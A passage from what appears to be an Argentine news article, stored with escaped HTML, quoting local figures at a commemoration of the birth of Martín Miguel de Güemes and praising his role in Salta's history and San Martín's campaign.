Mart\u00edn Miguel de G\u00fcemes. conmemoramos el nacimiento de uno de los m\u00e1ximos h\u00e9roes que tuvo Salta y la Argentina. Como salte\u00f1os tenemos el deber de enaltecer su nombre y recordarlo como aqu\u00e9l que marc\u00f3 nuestra cultura y tradici\u00f3n\u201d.<\/p>\n\n\n\n<p>Por su parte, Virgilio N\u00fa\u00f1ez, de la Agrupaci\u00f3n Tradicionalista Gauchos de G\u00fcemes, expres\u00f3: \u201cLo importante es no olvidarnos de este hombre que fue el brazo que tuvo San Mart\u00edn para cruzar los Andes. Si no hubiese sido por G\u00fcemes que estaba ac\u00e1 en el centro de la Patria nada podr\u00eda haber sido posible.
